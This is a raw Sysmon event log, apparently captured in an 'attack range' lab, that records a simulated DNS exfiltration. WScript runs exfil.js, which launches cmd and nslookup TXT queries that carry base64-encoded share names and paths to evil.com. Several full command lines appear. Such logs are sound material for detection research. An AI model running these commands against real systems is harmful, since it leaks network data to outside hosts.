14:16:12.949{2E1864BB-17A1-629A-783D-000000005F02}55525048C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-753E-000000005F02}5748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.957{2E1864BB-17AC-629A-753E-000000005F02}5748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllmdir.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.949{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuju.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.917{2E1864BB-17AC-629A-733E-000000005F02}51526324C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-743E-000000005F02}8076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.917{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-743E-000000005F02}8076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.916{2E1864BB-17AC-629A-723E-000000005F02}80202616C:\Windows\system32\cmd.exe{2E1864BB-17AC-629A-743E-000000005F02}8076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.916{2E1864BB-17AC-629A-743E-000000005F02}8076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-723E-000000005F02}8020C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuju.tmp 2>&1 10341000x8000000000000000195833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.880{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-733E-000000005F02}5152C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.880{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-733E-000000005F02}5152C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.880{2E1864BB-17AC-629A-733E-000000005F02}51526324C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-723E-000000005F02}8020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.864{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-733E-000000005F02}5152C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.864{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.864{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.864{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.864{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.864{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-723E-000000005F02}8020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.864{2E1864BB-17A1-629A-783D-000000005F02}55524296C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-723E-000000005F02}8020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.866{2E1864BB-17AC-629A-723E-000000005F02}8020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuju.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.849{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlomfc.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.833{2E1864BB-17AC-629A-703E-000000005F02}25604904C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-713E-000000005F02}2384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.833{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.833{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.833{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.833{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.833{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-713E-000000005F02}2384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.833{2E1864BB-17AC-629A-6F3E-000000005F02}55805332C:\Windows\system32\cmd.exe{2E1864BB-17AC-629A-713E-000000005F02}2384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.839{2E1864BB-17AC-629A-713E-000000005F02}2384C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-6F3E-000000005F02}5580C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomfc.tmp 2>&1 